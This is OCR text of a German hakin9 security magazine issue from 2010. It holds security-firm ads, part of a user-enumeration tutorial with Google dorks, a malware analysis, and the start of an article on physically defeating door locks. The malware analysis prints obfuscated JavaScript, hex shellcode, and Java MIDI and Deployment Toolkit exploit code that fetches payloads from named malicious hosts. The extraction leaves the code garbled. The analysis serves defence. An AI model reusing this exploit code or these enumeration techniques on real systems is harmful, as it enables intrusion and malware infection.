tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
User Enumeration bei Web-Applikationen
hakin9orgde 9
Nun muumlssen wir noch unser Payload konfigurieren Hier verwenden wir bdquoPayload Set 1 present listldquo Man kann nun optional eine ganze Liste mit Benutzernamen laden oder einfach per Hand einige eintragen Nun muumlssen wir noch unterscheiden lassen wann ein Benutzer gefunden wur-de und wann nicht Dazu gehen wir in den Option-Tab und scrollen zu grep Wir aktivieren die Checkboxen bei bdquosearch
responses for these expressionsldquo und bdquosimple pattern
matchldquo Auszligerdem druumlcken wir auf clear Die voreingestell-ten Pattern brauchen wir nicht zu verwenden Wir wissen dass bei Eingabe eines existierenden Benutzernamens ein bdquoCheck your e-mail for the confirmation linkldquo zuruumlckgeliefert wird Also tragen wir genau diesen Satz ein und klicken auf add Nun geben wir noch an dass wird redirects folgen wol-len Damit haben wir alles noumltige konfiguriert Wir klicken in der Menuleiste auf intruder -gt start attack Nach einer kurzen Zeit erhalten wir erste Ergebnisse - der Intruder hat zwei Benutzer identifiziert (Abbildung 3) Eine gute Woumlrter-liste erhoumlht die Effizient natuumlrlich deutlich
Somit konnten wir leicht uumlber die Passwort-Verges-sen Funktion automatisiert Benutzer erfassen Natuumlrlich
funktioniert dies auch mit Registrierungssystemen die angeben ob ein Benutzername schon vergeben ist Den Moumlglichkeiten sind hier nur durch die eigene Kreativi-taumlt Grenzen gesetzt Mit dieser simplen Methode gelingt es einem Angreifer automatisiert Benutzernamen zu fin-den ndash doch was kann noch passieren
Eine oft uumlbersehene Tatsache ist dass das Problem oft vor der Tastatur sitzt Sprich der Admin hat etwas falsch konfiguriert So kann es vorkommen dass gan-ze Mitgliederlisten in Foren oumlffentlich zugaumlnglich sind oder im Cache von Suchmaschinen gefunden werden koumlnnen Durch Suchmaschinen wie Google lassen sich solche falsch konfigurierten Seiten leicht auffinden Ei-ne kleine Liste an Google Dorks ist in Listing 1 angege-ben Eine weitere Moumlglichkeit Benutzernamen zu identi-fizieren sind URLs Twitter ist hier ein schoumlnes Beispiel Jeder Benutzer kann sich unter twittercombenutzerna-me austoben Dies stellt eine weitere Moumlglichkeit dar automatisch Namen zu entlarven Wie bereits erwaumlhnt gibt es unzaumlhlige Moumlglichkeiten User Enumeration zu betreiben wodurch Bruteforce eine nicht zu unterschaumlt-zende Moumlglichkeit bleibt
Abbildung 4 Burpsuite Intruder hat zwei Benutzer identifizieren koumlnnen
Listing 1 Google Dorks
inurlmemberlistphp Powered by phpBB
php memberlist
txt memberlist
txt usernames
sql users
KAI RENZDer Autor befindet sich gerade in Ausbildung zum Fachinfor-matiker fuumlr Systemintegration In seiner Freizeit beschaumlftigt er sich mit Themen rund um IT-Sicherheit und Penetration Tes-tingKontakt mit dem Autor kairenzproof-of-conceptorg
2010wwwsigs-datacomde
Kontakt Anja Keszlig middot Lindlaustraszlige 2c D-53842 TroisdorfTel +49 (0) 22 41 23 41-201 middot Fax +49 (0) 22 41 23 41-199 middot Email anjakesssigs-datacomde
wwwsigs-datacomdewwwsigs-datacomde
Die ultimative Hacking-AkademieErfolgreiche Abwehr von Hacker-Angriffen und
sicherer Schutz Ihres NetzwerksKlaus Dieter Wolfinger20 ndash 22 September 201003 ndash 05 November 2010 FrankfM 2150- euro zzgl MwSt
Best Practices fuumlr sichere Web-AnwendungenSicherheitsluumlcken in Webanwendungen vermeiden
erkennen und schlieszligen ndash gemaumlszlig Empfehlung des BSIThomas Schreiber25 ndash 26 Oktober 2010 Duumlsseldorf08 ndash 09 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Sicherheit mit WebService-InfrastrukturenJoumlrg Bartholdt25 ndash 26 Oktober 201022 ndash 23 November 2010 Muumlnchen 1590- euro zzgl MwSt
Cloud Computing im praktischen EinsatzArnd Kleinbeck amp Stefan Tilkov24 Oktober 2010 Muumlnchen10 Dezember 2010 Koumlln 990- euro zzgl MwSt
iPhone Grundlagen und EntwicklungHendrik Schreiber11 ndash 12 Oktober 2010 Koumlln11 ndash 12 Dezember 2010 Koumlln 1590- euro zzgl MwSt
NEU ndash jetzt 3-taumlgig CSM Certified ScrumMaster Course
Voraussetzung fuumlr die Zertifizierung zum Scrum MasterSabine Canditt25 ndash 27 Oktober 2010 Muumlnchen07 ndash 09 Dezember 2010 Muumlnchen 2150- euro zzgl MwSt
Secure Coding mit Java EEEntwicklung einbruchssicherer Webanwendungen
und Webservices unter Java EEMirko Richter26 ndash 27 Oktober 201006 ndash 07 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Web Application Firewall StarterEssentielles Web Application Firewall Grundwissen
Achim Hoffmann17 November 2010 Muumlnchen 990- euro zzgl MwSt
Advanced Web Application Security TestingProfessionelle Sicherheitsuntersuchungen von
Enterprise-Webanwendungen durchfuumlhrenThomas Schreiber01 ndash 02 Dezember 2010 Muumlnchen 1590- euro zzgl MwSt
Erfolgreich durch Wissensvermittlung aus 1 Hand
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 11
Im untersuchten Beispiel handelt es sich um ei-ne E-Mail die massenhaft versandt wird und eine HTML-Datei als Anhang enthaumllt Die E-Mail hat eine
unverfaumlngliche Betreffzeile wie bdquoRe Vacationldquo oder bdquoRan-dolph Plansldquo und einen ebenfalls unverdaumlchtigen Text wie beispielsweise
bdquoThank you very much for meeting with me on Satur-
day Attached are the plans for the Randolph Street De-
velopment project we discussed If you have any ques-
tions please dont hesitate to contact me
Thanks againldquoIm HTML-Anhang befindet sich ein eingebetteter
JavaScript-Code Um die Erkennung des JavaScript- Codes zu erschweren wurde er verschleiertunleserlich gemacht in der Fachsprache auch als Obfuscation be-zeichnet (vgl Listing 1)
Wird die Datei 39035xlshtml im Anhang im Brow-ser aufgerufen dann wird der Nutzer mittels des Ja-vaScripts an eine bestimmte Internetseite weitergeleitet die Schadcode enthaumllt Schreibt man das JavaScript-Codefragment leserlicher dann sieht man dass eine Weiterleitung zur Seite httpnumerouno-indiacomx
html fuumlhrt1 (vgl Listing 2)Auf der weitergeleiteten WebSite sieht man eine
weitere Weiterleitung an die URL httpscaner-gczccscanner10afid=24 Interessant ist hier nicht die Weiterleitung an eine weitere Seite sondern die Tatsache dass ein unsichtbares iFrame mit Brei-te 0 Pixel und Houmlhe 0 Pixel geladen wird Schauen wir uns die dahinterliegende Seite httparestyute
comsadhbdsa879321jbdasindexphp etwas ge-nauer an (vgl Listing 3)
Malware-Doppelschlag per JavaScript und JavaApplet Automatischer Download durch JavaScript und Ausbruch aus der Virtuellen Java Umgebung
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun des Anwenders oder nur mit sehr wenig Einflussnahme des Anwenders Schadsoftware installieren Das eleven Research-Team hat ein Beispiel naumlher untersucht
IN DIESEM ARTIKEL ERFAHREN SIE
wird
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN-
Script und HTML
Michael Peick
Listing 1 Die Datei 39035xlshtml
ltscript language=JavaScript type=textjavascriptgtfunction etgr(zj4r)varnbo97bvgy=kpn8iyv2=0ocdfu
mipqrlx=nt-v hegtsaltp3jej446=iyv2lengtheval(unescape(66un63ti6Fn r61iy28ku
79c)62vg79+=6Buyc7D))for(p3je=0p3jeltzj4rlengthp3je++)bo97=zj4rcharAt(p3je)k
pn8=iyv2indexOf(bo97)if(kpn8gt-1)kpn8-=(p3je+1)j446if(kpn8lt0)kpn8+=j446raiy(iyv2
charAt(kpn8))elseraiy(bo97)eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv67y
=2222))etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)ltscriptgtltnoscriptgtTo display this page you need a browser that supports
JavaScriptltnoscriptgt
10201012
FORTGESCHRITTENE
Version ein bestimmter Codeblock angesprungen wel-cher eine Schwachstelle in der JVM ausnutzt wodurch ein Jailbreak ermoumlglicht wird Urspruumlnglich sollen Java-Anwendungen in einer Art sicheren Sandbox laufen und keinen Schaden im Computer anrichten2 Diese Barrie-re ist in unserem Beispiel durchbrochen In dem Code-fragment unten (vgl Listing 4a 4b) betrifft die aus-genutzte Schwachstelle vor allem die Java-Versionen bis einschlieszliglich 160_16 Unter httpvreugdenhil-
researchnl201005java-midi-parse-vulnerabilitieskann jeder Interessierte detaillierte Informationen zur verwendeten Schwachstelle erhalten Ausgangspunkt ist ein Fehler in der Verarbeitung von URLs im einge-bauten Midiplayer von Java
Beim Ausnutzen der Schwachstelle wird der Shell-code ausgefuumlhrt welcher nun vollen Zugriff auf das System hat und Schadsoftware mitsamt Trojaner von der externen Quelle (URL) nachladen kann
Sollte der Benutzer eine aumlltere Java-Version installiert haben so wird eine andere Codepassage angesprun-gen die Schwachstellen aumllterer Java-Versionen aus-nutzt
Hier ist ein Java-Applet eingebettet welches beim Aufruf der Seite von der Java-Virtual-Machine ausge-fuumlhrt wird sofern diese im Browser installiert und akti-viert ist Ein weiterer verschleierter JavaScript-Code fin-det sich ebenfalls
Zunaumlchst analysieren wir das Java-Applet tmpdesjar In der Datei befinden sich drei Java-Klassen von denen eine namens devsAdgredY als Einsprungs-punkt fuumlr das Applet dient Mit einem Java-Decompiler kann man die Klassen welche momentan in Java-Byte-code vorliegen in leserlichen Java-Quelltext uumlberfuumlh-ren Dies entspricht nicht ganz dem originalem Quell-text kommt ihm aber recht nahe Wir benutzen dafuumlr den Decompiler von httpjavadecompilerfreefrSchaut man sich nun den Java-Quelltext an stellt man fest dass keine Obfuscation fuumlr Java wie zB das un-ter der GPL 2+ stehende ProGuard benutzt wurden Was zu erwarten gewesen waumlre um die Erkennung zu erschweren
Nach einer Verifikation der als Parameter uumlbergebe-nen URL httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1 wird abhaumlngig von der Java-
Listing 2 Weiterleitung an eine weitere Seite
function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) function etgr(zj4r)
var
bo97 bvgy =
kpn8 iyv2 = 0ocdfumipqrlx=nt-v hegtsalt
p3je j446 = iyv2length
function raiy(kuyc)bvgy+=kuyc
eval(unescape(66un63ti6Fn r61iy28ku79c)
62vg79+=6Buyc7D))
for (p3je = 0 p3je lt zj4rlength p3je++)
bo97 = zj4rcharAt(p3je)
kpn8 = iyv2indexOf(bo97)
if (kpn8 gt -1) +
kpn8 -= (p3je + 1) j446
if (kpn8 lt 0)
kpn8 += j446
raiy(iyv2charAt(kpn8))
else
raiy(bo97)
documentwrite(bvgy)bvgy=
eval(unescape(64oc75me6Etw72it65(b76gy)3Bbv
67y=2222))
documentwrite(ltmeta http-equiv=refresh
content=0url=httpnumerouno-
indiacomxhtml gt)
etgr(0ivda0gts-0me-hc=oxgtfth-00ns-vd=x
emocgtaltmsatmsolltituqchiix-
eltu0alpaxr)
if (this_is == an_example)
do_something()
else
var a = b (c d) e[f]
PLEASE WAITING 4 SECONDS
ltmeta http-equiv=refresh content=4url=http
gt
ltiframe width=0 height=0 src=httparestyute
comsadhbdsa879321jbdasindex
phpgtltiframegt
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 13
Listing 3 Seite bdquohttparestyutecomsadhbdsa879321jbdasindexphprdquo (gekuumlrztes HTML Dokument)
ltbody id=greldm2gt
ltapplet archive=tmpdesjar code=devsAdgredY
width=462 height=255gt
ltparam name=data VALUE=httparestyute
comsadhbdsa879321jbdasl
phpdeserialize=6eampi=1gt
ltparam name=cc value=1gt
ltappletgt
ltbodygt
ltscriptgtvar cmjve3=dltiltih=A2F40Jy=soayQaUab0
=gioltgt~d55003c844047000000
000001000001100200000000000000000D
0035D4266064660005400D10030001A000-
0000410060A)(VcroltB=iillA0A50Cet
beseErsltEe 00000000000D01A
DD0001D100031400400D10084000000003
0060LHehJ)function jvfpb(blktgw)
return blktgwreplace(ig
)replace(~ig)replace(raquo
igStringfromCharCode(0x20x5))
replace(lt95gtigString
fromCharCode(0x2E0x2))
documentwrite(ltpgt1663ltpgt)var
ivypgs3=parseInt(document
getElementById(greldm2)
getElementsByTagName(String
fromCharCode(0x70))[parseInt(String
fromCharCode(0x30))]innerHTML)var
kwjse=for (cqdqdsc = ivypgs3
cqdqdsc gt 0 cqdqdsc--)for (gtkvdm
= ivypgs3-cqdqdsc gtkvdm lt= cmjve3
length gtkvdm=gtkvdm+ivypgs3)
kwjse=kwjse+cmjve3
charAt(gtkvdm)var
fnhld=kwjse+var isguhrd=jvfpb(fn
hld)eval(isguhrd)ltscriptgt
Listing 4a Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
public void init()
shellcode
String str2 = 505351525657559CE8000000005D83ED0D31C06
4034030780C8B400C8B701CAD8B4008EB0
98B40348D407C8B403C5657BE5E0100000
1EEBF4E01000001EFE8D60100005F5E89E
A81C25E010000526880000000FF954E010
00089EA81C25E01000031F601C28A9C356
302000080FB007406881C3246EBEEC6043
20089EA81C24502000052FF95520100008
9EA81C2500200005250FF9
5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
A01000089EA81C25E01000052688000000
0FF954E01000089EA81C25E01000031F60
1C28A9C356E02000080FB007406881C324
6EBEEC604320089EA81C24502000052FF9
55201000089EA81C2500200005250FF955
60100006A006A0089EA81C25E010000528
9EA81C2A6020000526A00FFD06
A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
0000000000000000000000000000047657
454656D705061746841004C6F61644C696
272617279410047657450726F634164647
26573730057696E4578656300BB89F289F
730C0AE75FD29F789F931C0BE3C0000000
3B51B02000066AD03851B0200008B70788
3C61C03B51B0200008DBD1F020000AD038
51B020000ABAD03851B0200005
0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
3A65974045E43EBE95E93D1E0038527020
00031F69666ADC1E00203851F02000089C
6AD03851B020000C3EB100000000000000
000000000000000000089851B020000565
7E858FFFFFF5F5EAB01CE803EBB7402EBE
DC355524C4D4F4E2E444C4C0055524C446
F776E6C6F6164546F46696C65410070646
67570642E65786500637261736
82E70687000
nops for the nop-slice
String str10 = 90909090
String java_version = SystemgetProperty(java
version)
url
String url = getParameter(data) applet method
int i = 0
int j = 0
while (urlcharAt(i) = )
j += urlcharAt(i)
i += 1
j += 7
j = 256
String checksum = IntegertoHexString(j)
checksum = 6e correct for the url
httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1
if (urlindexOf(deserialize= + checksum) == -1)
return
10201014
FORTGESCHRITTENE
Zusaumltzlich wird noch das oben erwaumlhnte verschleierte JavaScript auf der urspruumlnglichen HTML-Seite geladen Dieses ist noch erstaunlicher denn es enthaumllt gleich ei-ne ganze Ladung von Exploits fuumlr Java Adobe Flash sowie Adobes PDF Reader bereit Der sbquoAuthorlsquo der Sei-te war auf houmlchste Kompatibilitaumlt aus denn auch hier werden nur bestimmte ndash vor allem neuere ndash Versionen der Browser Plugins unterstuumltzt (vgl Listing 5)
Unter httpwwwexploit-dbcomexploits12117 fin-det man eine Beschreibung der Schwachstelle Diese betrifft zusaumltzlich zum analysierten Applet die Java-Ver-sion 160_19
Zusammenfassend laumlsst sich feststellen dass Schadsoftware auf verschiedensten Wegen ins Sys-tem gelangen kann Es ist nicht mehr notwendig Programme zu installieren oder aumlhnliches Die hier beschriebene HTML-Datei koumlnnte auch in einem HTML-faumlhigen E-Mail-Client ausgefuumlhrt werden Ebenso kann die iFrame-Konstruktion in E-Mails platziert werden Es sind nicht nur einzelne Pro-gramme oder PlugIns fuumlr Browser betroffen son-dern es wird versucht gezielt neue Schwachstellen fuumlr mehrere populaumlre Programme zu finden was der letzte Ausschnitt des JavaScript-Codes zeigt Auch
Listing 4b Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
Object localObject1
Object localObject2
Object localObject4
Object localObject5
String str20
String str21
String str22
if ((((java_versionindexOf(160_11) = -1) ||
(java_versionindexOf(160_12) = -1) ||
(java_versionindexOf(160_13) = -1) ||
(java_versionindexOf(160_14) = -1) ||
(java_versionindexOf(160_15) = -1) ||
(java_versionindexOf(160_16) = -1) 1 0) amp
(urlindexOf(i=1) == -1 1 0)) = 0)
Java midi vulnerable see http
vreugdenhilresearchnl201005
java-midi-parse-vulnerabilities
for detailed explaination The author claims that it
was in java 160_19
localObject1 =
localObject1 = repeat( 303)
using windows no return
localObject2 = SystemgetProperty(osname)
toLowerCase()
if (((String)localObject2)indexOf(win) gt= 0)
localObject1 = repeat( 302)
else
return
the core of the vulnerable create a malicious url
and ask javas midiplayer to play
localObject1 = + (String)localObject1 +
ZZZZZZ
try
String str19 = url + 11
localObject4 =
for (int k = 0 k lt str19length() k++)
localObject4 = (String)localObject4 + Integer
toHexString(str19charAt(k))
while (((String)localObject4)length() 8 = 0)
localObject4 = (String)localObject4 + 26 0x26 =
amp
localObject4 = str2 + (String)localObject4
thismem = spray((String)localObject4 str10)
localObject5 = new URL((String)localObject1)
MidiSystemgetSequencer()
str21 =
MidiSystemgetSoundbank((URL)localObject5) lt-- put
in url here
str22 =
MidiSystemgetSequencer()
while (true)
Threadsleep(10L)
catch (Exception localException2)
Systemoutprintln(localException2)
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
